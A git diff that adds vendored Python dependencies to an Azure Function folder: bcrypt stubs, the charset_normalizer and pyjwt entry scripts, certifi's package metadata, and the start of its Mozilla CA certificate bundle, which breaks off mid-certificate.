b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/_bcrypt.abi3.so new file mode 100644 index 0000000..c088107 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/_bcrypt.abi3.so differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/_bcrypt.pyi b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/_bcrypt.pyi new file mode 100644 index 0000000..1f0dddb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/_bcrypt.pyi @@ -0,0 +1,4 @@ 
+import typing + +ffi: typing.Any +lib: typing.Any diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bcrypt/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bin/normalizer b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bin/normalizer new file mode 100644 index 0000000..c75ca8a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bin/normalizer @@ -0,0 +1,8 @@ +#!/usr/bin/python3 +# -*- coding: utf-8 -*- +import re +import sys +from charset_normalizer.cli.normalizer import cli_detect +if __name__ == '__main__': + sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0]) + sys.exit(cli_detect()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bin/pyjwt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bin/pyjwt new file mode 100644 index 0000000..7134bb1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/bin/pyjwt @@ -0,0 +1,8 @@ +#!/usr/bin/python3 +# -*- coding: utf-8 -*- +import re +import sys +from jwt.__main__ import main +if __name__ == '__main__': + sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0]) + sys.exit(main()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/LICENSE new file mode 100644 index 0000000..f1392a9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/LICENSE @@ -0,0 +1,21 @@ +This package contains a modified version of ca-bundle.crt: + +ca-bundle.crt -- Bundle of CA Root Certificates + +Certificate data from Mozilla as of: Thu Nov 3 19:04:19 2011# +This is a bundle of X.509 certificates of public Certificate Authorities +(CA). These were automatically extracted from Mozilla's root certificates +file (certdata.txt). This file can be found in the mozilla source tree: +http://mxr.mozilla.org/mozilla/source/security/nss/lib/ckfw/builtins/certdata.txt?raw=1# +It contains the certificates in PEM format and therefore +can be directly used with curl / libcurl / php_curl, or with +an Apache+mod_ssl webserver for SSL client authentication. +Just configure this file as the SSLCACertificateFile.# + +***** BEGIN LICENSE BLOCK ***** +This Source Code Form is subject to the terms of the Mozilla Public License, +v. 2.0. If a copy of the MPL was not distributed with this file, You can obtain +one at http://mozilla.org/MPL/2.0/. 
+ +***** END LICENSE BLOCK ***** +@(#) $RCSfile: certdata.txt,v $ $Revision: 1.80 $ $Date: 2011/11/03 15:11:58 $ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/METADATA new file mode 100644 index 0000000..b74868b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/METADATA @@ -0,0 +1,81 @@ +Metadata-Version: 2.1 +Name: certifi +Version: 2022.6.15 +Summary: Python package for providing Mozilla's CA Bundle. +Home-page: https://github.com/certifi/python-certifi +Author: Kenneth Reitz +Author-email: me@kennethreitz.com +License: MPL-2.0 +Project-URL: Source, https://github.com/certifi/python-certifi +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0) +Classifier: Natural Language :: English +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Requires-Python: >=3.6 +License-File: LICENSE + +Certifi: Python SSL Certificates +================================ + +Certifi provides Mozilla's carefully curated collection of Root Certificates for +validating the trustworthiness of SSL certificates while verifying the identity +of TLS hosts. It has been extracted from the `Requests`_ project. + +Installation +------------ + +``certifi`` is available on PyPI. Simply install it with ``pip``:: + + $ pip install certifi + +Usage +----- + +To reference the installed certificate authority (CA) bundle, you can use the +built-in function:: + + >>> import certifi + + >>> certifi.where() + '/usr/local/lib/python3.7/site-packages/certifi/cacert.pem' + +Or from the command line:: + + $ python -m certifi + /usr/local/lib/python3.7/site-packages/certifi/cacert.pem + +Enjoy! + +1024-bit Root Certificates +~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Browsers and certificate authorities have concluded that 1024-bit keys are +unacceptably weak for certificates, particularly root certificates. For this +reason, Mozilla has removed any weak (i.e. 1024-bit key) certificate from its +bundle, replacing it with an equivalent strong (i.e. 2048-bit or greater key) +certificate from the same CA. Because Mozilla removed these certificates from +its bundle, ``certifi`` removed them as well. + +In previous versions, ``certifi`` provided the ``certifi.old_where()`` function +to intentionally re-add the 1024-bit roots back into your bundle. This was not +recommended in production and therefore was removed at the end of 2018. + +.. _`Requests`: https://requests.readthedocs.io/en/master/ + +Addition/Removal of Certificates +-------------------------------- + +Certifi does not support any addition/removal or other modification of the +CA trust store content. This project is intended to provide a reliable and +highly portable root of trust to python deployments. Look to upstream projects +for methods to use alternate trust. 
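Since ``certifi`` only exposes the path to its bundle, wiring it into a TLS client is short. A minimal sketch using only the standard library (the URL here is illustrative, not part of ``certifi``):

.. code:: python

    import ssl
    from urllib.request import urlopen

    import certifi

    # Build a client-side SSL context that trusts exactly the Mozilla
    # bundle shipped with certifi, independent of the OS trust store.
    context = ssl.create_default_context(cafile=certifi.where())

    with urlopen("https://pypi.org", context=context) as response:
        print(response.status)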
+ + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/RECORD new file mode 100644 index 0000000..040bdbe --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/RECORD @@ -0,0 +1,14 @@ +certifi-2022.6.15.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +certifi-2022.6.15.dist-info/LICENSE,sha256=vp2C82ES-Hp_HXTs1Ih-FGe7roh4qEAEoAEXseR1o-I,1049 +certifi-2022.6.15.dist-info/METADATA,sha256=1sLjV7SjXkcGhJr631JUqCLCDnqgTyFoFe-tRLxakTE,2804 +certifi-2022.6.15.dist-info/RECORD,, +certifi-2022.6.15.dist-info/WHEEL,sha256=ewwEueio1C2XeHTvT17n8dZUJgOvyCWCt0WVNLClP9o,92 +certifi-2022.6.15.dist-info/top_level.txt,sha256=KMu4vUCfsjLrkPbSNdgdekS-pVJzBAJFO__nI8NF6-U,8 +certifi/__init__.py,sha256=SuZ3iYmzdRyUv-PiaZkquUgXtWZ16ICUKgymlEBspx0,94 +certifi/__main__.py,sha256=xBBoj905TUWBLRGANOcf7oi6e-3dMP4cEoG9OyMs11g,243 +certifi/__pycache__/__init__.cpython-39.pyc,, +certifi/__pycache__/__main__.cpython-39.pyc,, +certifi/__pycache__/core.cpython-39.pyc,, +certifi/cacert.pem,sha256=pZ_eiDoO-ddKudrQCWieABc9KFlbV0FsmLLugygMbkw,285222 +certifi/core.py,sha256=G5LqCBr4o8bozzzlYBE8nsd_ziB6XcxJiuMV4llFeYY,2515 +certifi/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/WHEEL new file mode 100644 index 0000000..725a409 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.0) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/top_level.txt new file mode 100644 index 0000000..acb5287 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi-2022.6.15.dist-info/top_level.txt @@ -0,0 +1 @@ +certifi diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__init__.py new file mode 100644 index 0000000..4066cd4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__init__.py @@ -0,0 +1,4 @@ +from .core import contents, where + +__all__ = ["contents", "where"] +__version__ = "2022.06.15" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__main__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__main__.py new file mode 100644 index 0000000..6e0544c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__main__.py @@ -0,0 +1,12 @@ +import argparse + +from certifi import contents, where + +parser = argparse.ArgumentParser() +parser.add_argument("-c", "--contents", action="store_true") +args = 
parser.parse_args() + +if args.contents: + print(contents()) +else: + print(where()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..e4865fa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/__main__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/__main__.cpython-39.pyc new file mode 100644 index 0000000..70566c7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/__main__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/core.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/core.cpython-39.pyc new file mode 100644 index 0000000..1f40347 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/__pycache__/core.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/cacert.pem b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/cacert.pem new file mode 100644 index 0000000..c92cc1d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/cacert.pem @@ -0,0 +1,4685 @@ + +# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA +# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA +# Label: "GlobalSign Root CA" +# Serial: 4835703278459707669005204 +# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a +# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c +# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99 +-----BEGIN CERTIFICATE----- +MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG +A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv +b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw +MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i +YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT +aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ +jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp +xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp +1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG +snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ +U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8 +9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E +BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B +AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz +yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE +38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP +AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad 
+DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME +HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4A== +-----END CERTIFICATE----- + +# Issuer: CN=Entrust.net Certification Authority (2048) O=Entrust.net OU=www.entrust.net/CPS_2048 incorp. by ref. (limits liab.)/(c) 1999 Entrust.net Limited +# Subject: CN=Entrust.net Certification Authority (2048) O=Entrust.net OU=www.entrust.net/CPS_2048 incorp. by ref. (limits liab.)/(c) 1999 Entrust.net Limited +# Label: "Entrust.net Premium 2048 Secure Server CA" +# Serial: 946069240 +# MD5 Fingerprint: ee:29:31:bc:32:7e:9a:e6:e8:b5:f7:51:b4:34:71:90 +# SHA1 Fingerprint: 50:30:06:09:1d:97:d4:f5:ae:39:f7:cb:e7:92:7d:7d:65:2d:34:31 +# SHA256 Fingerprint: 6d:c4:71:72:e0:1c:bc:b0:bf:62:58:0d:89:5f:e2:b8:ac:9a:d4:f8:73:80:1e:0c:10:b9:c8:37:d2:1e:b1:77 +-----BEGIN CERTIFICATE----- +MIIEKjCCAxKgAwIBAgIEOGPe+DANBgkqhkiG9w0BAQUFADCBtDEUMBIGA1UEChML +RW50cnVzdC5uZXQxQDA+BgNVBAsUN3d3dy5lbnRydXN0Lm5ldC9DUFNfMjA0OCBp +bmNvcnAuIGJ5IHJlZi4gKGxpbWl0cyBsaWFiLikxJTAjBgNVBAsTHChjKSAxOTk5 +IEVudHJ1c3QubmV0IExpbWl0ZWQxMzAxBgNVBAMTKkVudHJ1c3QubmV0IENlcnRp +ZmljYXRpb24gQXV0aG9yaXR5ICgyMDQ4KTAeFw05OTEyMjQxNzUwNTFaFw0yOTA3 +MjQxNDE1MTJaMIG0MRQwEgYDVQQKEwtFbnRydXN0Lm5ldDFAMD4GA1UECxQ3d3d3 +LmVudHJ1c3QubmV0L0NQU18yMDQ4IGluY29ycC4gYnkgcmVmLiAobGltaXRzIGxp +YWIuKTElMCMGA1UECxMcKGMpIDE5OTkgRW50cnVzdC5uZXQgTGltaXRlZDEzMDEG +A1UEAxMqRW50cnVzdC5uZXQgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgKDIwNDgp +MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArU1LqRKGsuqjIAcVFmQq +K0vRvwtKTY7tgHalZ7d4QMBzQshowNtTK91euHaYNZOLGp18EzoOH1u3Hs/lJBQe +sYGpjX24zGtLA/ECDNyrpUAkAH90lKGdCCmziAv1h3edVc3kw37XamSrhRSGlVuX +MlBvPci6Zgzj/L24ScF2iUkZ/cCovYmjZy/Gn7xxGWC4LeksyZB2ZnuU4q941mVT +XTzWnLLPKQP5L6RQstRIzgUyVYr9smRMDuSYB3Xbf9+5CFVghTAp+XtIpGmG4zU/ +HoZdenoVve8AjhUiVBcAkCaTvA5JaJG/+EfTnZVCwQ5N328mz8MYIWJmQ3DW1cAH +4QIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAdBgNV +HQ4EFgQUVeSB0RGAvtiJuQijMfmhJAkWuXAwDQYJKoZIhvcNAQEFBQADggEBADub +j1abMOdTmXx6eadNl9cZlZD7Bh/KM3xGY4+WZiT6QBshJ8rmcnPyT/4xmf3IDExo +U8aAghOY+rat2l098c5u9hURlIIM7j+VrxGrD9cv3h8Dj1csHsm7mhpElesYT6Yf +zX1XEC+bBAlahLVu2B064dae0Wx5XnkcFMXj0EyTO2U87d89vqbllRrDtRnDvV5b +u/8j72gZyxKTJ1wDLW8w0B62GqzeWvfRqqgnpv55gcR5mTNXuhKwqeBCbJPKVt7+ +bYQLCIt+jerXmCHG8+c8eS9enNFMFY3h7CI3zJpDC5fcgJCNs2ebb0gIFVbPv/Er +fF6adulZkMV8gzURZVE= +-----END CERTIFICATE----- + +# Issuer: CN=Baltimore CyberTrust Root O=Baltimore OU=CyberTrust +# Subject: CN=Baltimore CyberTrust Root O=Baltimore OU=CyberTrust +# Label: "Baltimore CyberTrust Root" +# Serial: 33554617 +# MD5 Fingerprint: ac:b6:94:a5:9c:17:e0:d7:91:52:9b:b1:97:06:a6:e4 +# SHA1 Fingerprint: d4:de:20:d0:5e:66:fc:53:fe:1a:50:88:2c:78:db:28:52:ca:e4:74 +# SHA256 Fingerprint: 16:af:57:a9:f6:76:b0:ab:12:60:95:aa:5e:ba:de:f2:2a:b3:11:19:d6:44:ac:95:cd:4b:93:db:f3:f2:6a:eb +-----BEGIN CERTIFICATE----- +MIIDdzCCAl+gAwIBAgIEAgAAuTANBgkqhkiG9w0BAQUFADBaMQswCQYDVQQGEwJJ +RTESMBAGA1UEChMJQmFsdGltb3JlMRMwEQYDVQQLEwpDeWJlclRydXN0MSIwIAYD +VQQDExlCYWx0aW1vcmUgQ3liZXJUcnVzdCBSb290MB4XDTAwMDUxMjE4NDYwMFoX +DTI1MDUxMjIzNTkwMFowWjELMAkGA1UEBhMCSUUxEjAQBgNVBAoTCUJhbHRpbW9y +ZTETMBEGA1UECxMKQ3liZXJUcnVzdDEiMCAGA1UEAxMZQmFsdGltb3JlIEN5YmVy +VHJ1c3QgUm9vdDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKMEuyKr +mD1X6CZymrV51Cni4eiVgLGw41uOKymaZN+hXe2wCQVt2yguzmKiYv60iNoS6zjr +IZ3AQSsBUnuId9Mcj8e6uYi1agnnc+gRQKfRzMpijS3ljwumUNKoUMMo6vWrJYeK +mpYcqWe4PwzV9/lSEy/CG9VwcPCPwBLKBsua4dnKM3p31vjsufFoREJIE9LAwqSu +XmD+tqYF/LTdB1kC1FkYmGP1pWPgkAx9XbIGevOF6uvUA65ehD5f/xXtabz5OTZy +dc93Uk3zyZAsuT3lySNTPx8kmCFcB5kpvcY67Oduhjprl3RjM71oGDHweI12v/ye 
+jl0qhqdNkNwnGjkCAwEAAaNFMEMwHQYDVR0OBBYEFOWdWTCCR1jMrPoIVDaGezq1 +BE3wMBIGA1UdEwEB/wQIMAYBAf8CAQMwDgYDVR0PAQH/BAQDAgEGMA0GCSqGSIb3 +DQEBBQUAA4IBAQCFDF2O5G9RaEIFoN27TyclhAO992T9Ldcw46QQF+vaKSm2eT92 +9hkTI7gQCvlYpNRhcL0EYWoSihfVCr3FvDB81ukMJY2GQE/szKN+OMY3EU/t3Wgx +jkzSswF07r51XgdIGn9w/xZchMB5hbgF/X++ZRGjD8ACtPhSNzkE1akxehi/oCr0 +Epn3o0WC4zxe9Z2etciefC7IpJ5OCBRLbf1wbWsaY71k5h+3zvDyny67G7fyUIhz +ksLi4xaNmjICq44Y3ekQEe5+NauQrz4wlHrQMz2nZQ/1/I6eYs9HRCwBXbsdtTLS +R9I4LtD+gdwyah617jzV/OeBHRnDJELqYzmp +-----END CERTIFICATE----- + +# Issuer: CN=Entrust Root Certification Authority O=Entrust, Inc. OU=www.entrust.net/CPS is incorporated by reference/(c) 2006 Entrust, Inc. +# Subject: CN=Entrust Root Certification Authority O=Entrust, Inc. OU=www.entrust.net/CPS is incorporated by reference/(c) 2006 Entrust, Inc. +# Label: "Entrust Root Certification Authority" +# Serial: 1164660820 +# MD5 Fingerprint: d6:a5:c3:ed:5d:dd:3e:00:c1:3d:87:92:1f:1d:3f:e4 +# SHA1 Fingerprint: b3:1e:b1:b7:40:e3:6c:84:02:da:dc:37:d4:4d:f5:d4:67:49:52:f9 +# SHA256 Fingerprint: 73:c1:76:43:4f:1b:c6:d5:ad:f4:5b:0e:76:e7:27:28:7c:8d:e5:76:16:c1:e6:e6:14:1a:2b:2c:bc:7d:8e:4c +-----BEGIN CERTIFICATE----- +MIIEkTCCA3mgAwIBAgIERWtQVDANBgkqhkiG9w0BAQUFADCBsDELMAkGA1UEBhMC +VVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xOTA3BgNVBAsTMHd3dy5lbnRydXN0 +Lm5ldC9DUFMgaXMgaW5jb3Jwb3JhdGVkIGJ5IHJlZmVyZW5jZTEfMB0GA1UECxMW +KGMpIDIwMDYgRW50cnVzdCwgSW5jLjEtMCsGA1UEAxMkRW50cnVzdCBSb290IENl +cnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTA2MTEyNzIwMjM0MloXDTI2MTEyNzIw +NTM0MlowgbAxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMTkw +NwYDVQQLEzB3d3cuZW50cnVzdC5uZXQvQ1BTIGlzIGluY29ycG9yYXRlZCBieSBy +ZWZlcmVuY2UxHzAdBgNVBAsTFihjKSAyMDA2IEVudHJ1c3QsIEluYy4xLTArBgNV +BAMTJEVudHJ1c3QgUm9vdCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTCCASIwDQYJ +KoZIhvcNAQEBBQADggEPADCCAQoCggEBALaVtkNC+sZtKm9I35RMOVcF7sN5EUFo +Nu3s/poBj6E4KPz3EEZmLk0eGrEaTsbRwJWIsMn/MYszA9u3g3s+IIRe7bJWKKf4 +4LlAcTfFy0cOlypowCKVYhXbR9n10Cv/gkvJrT7eTNuQgFA/CYqEAOwwCj0Yzfv9 +KlmaI5UXLEWeH25DeW0MXJj+SKfFI0dcXv1u5x609mhF0YaDW6KKjbHjKYD+JXGI +rb68j6xSlkuqUY3kEzEZ6E5Nn9uss2rVvDlUccp6en+Q3X0dgNmBu1kmwhH+5pPi +94DkZfs0Nw4pgHBNrziGLp5/V6+eF67rHMsoIV+2HNjnogQi+dPa2MsCAwEAAaOB +sDCBrTAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zArBgNVHRAEJDAi +gA8yMDA2MTEyNzIwMjM0MlqBDzIwMjYxMTI3MjA1MzQyWjAfBgNVHSMEGDAWgBRo +kORnpKZTgMeGZqTx90tD+4S9bTAdBgNVHQ4EFgQUaJDkZ6SmU4DHhmak8fdLQ/uE +vW0wHQYJKoZIhvZ9B0EABBAwDhsIVjcuMTo0LjADAgSQMA0GCSqGSIb3DQEBBQUA +A4IBAQCT1DCw1wMgKtD5Y+iRDAUgqV8ZyntyTtSx29CW+1RaGSwMCPeyvIWonX9t +O1KzKtvn1ISMY/YPyyYBkVBs9F8U4pN0wBOeMDpQ47RgxRzwIkSNcUesyBrJ6Zua +AGAT/3B+XxFNSRuzFVJ7yVTav52Vr2ua2J7p8eRDjeIRRDq/r72DQnNSi6q7pynP +9WQcCk3RvKqsnyrQ/39/2n3qse0wJcGE2jTSW3iDVuycNsMm4hH2Z0kdkquM++v/ +eu6FSqdQgPCnXEqULl8FmTxSQeDNtGPPAUO6nIPcj2A781q0tHuu2guQOHXvgR1m +0vdXcDazv/wor3ElhVsT/h5/WrQ8 +-----END CERTIFICATE----- + +# Issuer: CN=AAA Certificate Services O=Comodo CA Limited +# Subject: CN=AAA Certificate Services O=Comodo CA Limited +# Label: "Comodo AAA Services root" +# Serial: 1 +# MD5 Fingerprint: 49:79:04:b0:eb:87:19:ac:47:b0:bc:11:51:9b:74:d0 +# SHA1 Fingerprint: d1:eb:23:a4:6d:17:d6:8f:d9:25:64:c2:f1:f1:60:17:64:d8:e3:49 +# SHA256 Fingerprint: d7:a7:a0:fb:5d:7e:27:31:d7:71:e9:48:4e:bc:de:f7:1d:5f:0c:3e:0a:29:48:78:2b:c8:3e:e0:ea:69:9e:f4 +-----BEGIN CERTIFICATE----- +MIIEMjCCAxqgAwIBAgIBATANBgkqhkiG9w0BAQUFADB7MQswCQYDVQQGEwJHQjEb +MBkGA1UECAwSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHDAdTYWxmb3JkMRow +GAYDVQQKDBFDb21vZG8gQ0EgTGltaXRlZDEhMB8GA1UEAwwYQUFBIENlcnRpZmlj +YXRlIFNlcnZpY2VzMB4XDTA0MDEwMTAwMDAwMFoXDTI4MTIzMTIzNTk1OVowezEL 
+MAkGA1UEBhMCR0IxGzAZBgNVBAgMEkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UE +BwwHU2FsZm9yZDEaMBgGA1UECgwRQ29tb2RvIENBIExpbWl0ZWQxITAfBgNVBAMM +GEFBQSBDZXJ0aWZpY2F0ZSBTZXJ2aWNlczCCASIwDQYJKoZIhvcNAQEBBQADggEP +ADCCAQoCggEBAL5AnfRu4ep2hxxNRUSOvkbIgwadwSr+GB+O5AL686tdUIoWMQua +BtDFcCLNSS1UY8y2bmhGC1Pqy0wkwLxyTurxFa70VJoSCsN6sjNg4tqJVfMiWPPe +3M/vg4aijJRPn2jymJBGhCfHdr/jzDUsi14HZGWCwEiwqJH5YZ92IFCokcdmtet4 +YgNW8IoaE+oxox6gmf049vYnMlhvB/VruPsUK6+3qszWY19zjNoFmag4qMsXeDZR +rOme9Hg6jc8P2ULimAyrL58OAd7vn5lJ8S3frHRNG5i1R8XlKdH5kBjHYpy+g8cm +ez6KJcfA3Z3mNWgQIJ2P2N7Sw4ScDV7oL8kCAwEAAaOBwDCBvTAdBgNVHQ4EFgQU +oBEKIz6W8Qfs4q8p74Klf9AwpLQwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQF +MAMBAf8wewYDVR0fBHQwcjA4oDagNIYyaHR0cDovL2NybC5jb21vZG9jYS5jb20v +QUFBQ2VydGlmaWNhdGVTZXJ2aWNlcy5jcmwwNqA0oDKGMGh0dHA6Ly9jcmwuY29t +b2RvLm5ldC9BQUFDZXJ0aWZpY2F0ZVNlcnZpY2VzLmNybDANBgkqhkiG9w0BAQUF +AAOCAQEACFb8AvCb6P+k+tZ7xkSAzk/ExfYAWMymtrwUSWgEdujm7l3sAg9g1o1Q +GE8mTgHj5rCl7r+8dFRBv/38ErjHT1r0iWAFf2C3BUrz9vHCv8S5dIa2LX1rzNLz +Rt0vxuBqw8M0Ayx9lt1awg6nCpnBBYurDC/zXDrPbDdVCYfeU0BsWO/8tqtlbgT2 +G9w84FoVxp7Z8VlIMCFlA2zs6SFz7JsDoeA3raAVGI/6ugLOpyypEBMs1OUIJqsi +l2D4kF501KKaU73yqWjgom7C12yxow+ev+to51byrvLjKzg6CYG1a4XXvi3tPxq3 +smPi9WIsgtRqAEFQ8TmDn5XpNpaYbg== +-----END CERTIFICATE----- + +# Issuer: CN=QuoVadis Root CA 2 O=QuoVadis Limited +# Subject: CN=QuoVadis Root CA 2 O=QuoVadis Limited +# Label: "QuoVadis Root CA 2" +# Serial: 1289 +# MD5 Fingerprint: 5e:39:7b:dd:f8:ba:ec:82:e9:ac:62:ba:0c:54:00:2b +# SHA1 Fingerprint: 